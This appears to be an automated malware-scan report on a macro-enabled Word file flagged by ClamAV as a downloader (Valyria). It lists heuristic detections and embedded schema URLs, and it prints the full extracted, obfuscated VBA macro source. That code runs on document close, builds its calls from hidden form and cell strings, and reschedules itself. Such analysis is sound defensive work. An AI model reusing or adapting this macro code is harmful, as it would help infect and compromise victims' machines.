MALICIOUS
222
Risk Score
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set n4 = CreateObject(UserForm1.qk & UserForm1.bz) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7003 bytes |
SHA-256: 66e2c4223cd521f450169b46d43708c5d07cd4378c4f66327fb980d95082d9f1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public no, kf, ce, c9, si, n4, m9, qv, p6, hix, k9, mv, nzz, ke, n3, bb
Sub Document_Close()
h6
End Sub
Sub h6()
On Error Resume Next
UserForm2.ComboBox1.ListIndex = 5
kt = UserForm2.ComboBox13
Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
n4.DisplayAlerts = False
ljw = 1301
cn = 0
Err.Number = 0
While ljw <> 0 And cn < 32
Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
ljw = Err.Number
cn = cn + 16
Wend
If ljw <> 0 Then
ErrHandler:
na8 = CallByName(Application, UserForm1.eb & UserForm1.qf, 2)
If na8 <> False Then
or4 = UserForm2.ComboBox6
Set kr = CreateObject(UserForm1.ik & UserForm1.f3)
CallByName kr.Documents, UserForm1.ez & UserForm1.pb, 1, ActiveDocument.FullName, , True
CallByName kr, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 2), UserForm1.i4 & UserForm1.l1 & "h6"
Else
jh = UserForm2.ComboBox8
CallByName Application, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 17), UserForm1.i4 & UserForm1.l1 & "h6"
End If
n4.Quit
Exit Sub
End If
Dim c7
Set c7 = n4.sheets(1)
god = UserForm2.ComboBox15
vv = "'"
bb = n4.sheets(5).Cells(1, 1)
If Len(bb) < 1 Then
If n4.ActiveWorkbook.Title <> "Google" Then
GoTo ErrHandler
Else
cd = UserForm2.ComboBox3
Exit Sub
End If
End If
t1 = n4.sheets(1).Cells(49, 27).Value
r2 = c7.Cells(99, 20).Value
hix = n4.sheets(1).Cells(93, 60).Value
k9 = n4.sheets(2).Cells(134, 44).Value
si = n4.sheets(2).Cells(113, 7).Value
q0 = n4.sheets(2).Cells(78, 9).Value
dq = n4.sheets(1).Cells(80, 30).Value
ga = UserForm2.ComboBox9
v1y = n4.sheets(3).Cells(52, 45).Value
jp = n4.sheets(2).Cells(11, 2).Value
o9 = n4.sheets(1).Cells(29, 52).Value
nzz = n4.sheets(2).Cells(126, 10).Value
m9 = c7.Cells(124, 1).Value
p6 = n4.sheets(3).Cells(24, 6).Value
p9 = n4.sheets(3).Cells(74, 12).Value
hi = n4.sheets(2).Cells(44, 36).Value
jv = UserForm2.ComboBox5
mv = c7.Cells(53, 50).Value
tc9 = n4.sheets(1).Cells(149, 47).Value
ug = n4.sheets(2).Cells(51, 53).Value
no = n4.sheets(3).Cells(131, 27).Value
di2 = n4.sheets(3).Cells(143, 51).Value
h8 = c7.Cells(116, 32).Value
j67 = UserForm2.ComboBox12
qv = n4.sheets(3).Cells(112, 29).Value
kf = n4.sheets(3).Cells(134, 8).Value
gs = n4.sheets(3).Cells(131, 46).Value
r4 = UserForm2.ComboBox21
pl = n4.sheets(2).Cells(58, 24).Value
rk3 = UserForm2.ComboBox5
n3 = ""
Set Sh1 = n4.sheets(4)
jf = 1
k5 = True
While k5
lc = Sh1.Cells(jf, 1).Value
If Len(lc) < 1 Then
k5 = False
Else
n3 = n3 & lc
End If
jf = jf + 1
Wend
d6 = CallByName(n4, o9, 2)
UserForm1.pk9.Value = dq & d6 & ug
UserForm1.bk.Value = r2
CallByName CreateObject(pl), h8, 1, UserForm1.pk9, tc9, UserForm1.bk
Set o4 = CreateObject(t1)
ig = UserForm2.ComboBox19
Set ac = CallByName(o4, q0, 2)
Set r1 = CallByName(ac, gs, 1)
Set p6 = CallByName(o4, p6, 2)
Set c9 = o4
h7 = UserForm2.ComboBox17
UserForm5.ComboBox1 = "o1"
Set no = CallByName(ke, no, 2)
qv = CallByName(no, qv, 2)
UserForm1.lx.Value = di2 & v1y
UserForm3.ComboBox1 = jp
fy = UserForm2.ComboBox13
UserForm1.lx.Value = p9
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = qv
o4 = fm
E = k3
duq = UserForm2.ComboBox12
c7 = c3
ac = hm
r1 = et
p6 = ek
hix = jr
j84 = UserForm2.ComboBox9
k9 = hz
ke = dv
no = fkt
c2k = UserForm2.ComboBox27
c9 = n7
DoEvents
CallByName n4, hi, 1
e8 = UserForm2.ComboBox26
n4 = uj
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C80ED98B-F814-4187-8274-0F9E8E1BEC6D}{D573506A-15DC-4A19-BDC2-289AC28A48B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{7F2874F9-FFFD-4B3D-9F74-0B433096FF5A}{F2E480F2-E86F-45CA-B15F-FAB9CF9EDF24}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
vj = UserForm2.ComboBox10
hv = UserForm2.Controls.Count - 1
bd = UserForm2.ComboBox23
mx = UserForm2.ComboBox18
dy = ""
For mu7 = 1 To hv Step 2
dy = dy & UserForm2.Controls.Item(mu7)
Next
hs = UserForm2.ComboBox7
ComboBox1.AddItem "f8"
b7 = UserForm2.ComboBox5
ComboBox1.AddItem "zg"
ComboBox1.AddItem "ei"
ComboBox1.AddItem "ed"
ComboBox1.AddItem "i3"
ComboBox1.AddItem dy
ComboBox1.AddItem "gz"
ro = UserForm2.ComboBox22
p0 = UserForm2.ComboBox6
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{26CFAB0F-445A-48D4-A1AB-73861D6FA525}{82CB858B-FD75-432E-B12A-44763EAC3EBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.no, ActiveDocument.m9, VbMethod, 1, ActiveDocument.qv
CallByName ActiveDocument.no, ActiveDocument.kf, VbMethod, UserForm1.lx.Value
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{615C4FC4-A62E-44E5-A2F0-2D83C21282C9}{1EF39E8A-4508-497E-96D0-6B752228C4EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.c9, ActiveDocument.si, VbMethod, UserForm1.lx.Value, ActiveDocument.n3, ActiveDocument.bb
End Sub
Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5CE4AFA8-8333-47D0-A4EA-7D133B805A8C}{BE2A8477-15A3-4171-984C-64AF0E672AA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Set ActiveDocument.hix = CallByName(ActiveDocument.p6, ActiveDocument.hix, VbGet)
Set ActiveDocument.k9 = CallByName(ActiveDocument.hix, ActiveDocument.k9, VbGet)
Set ActiveDocument.ke = CallByName(ActiveDocument.k9, ActiveDocument.mv, VbMethod, ActiveDocument.nzz)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes |
SHA-256: 7c26191f361eb97cb16447f11420a8dd572d3c8abe3c687b60e3a40f3cbf8750 |
|||
|
Detection
ClamAV:
Doc.Downloader.Valyria-10033915-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.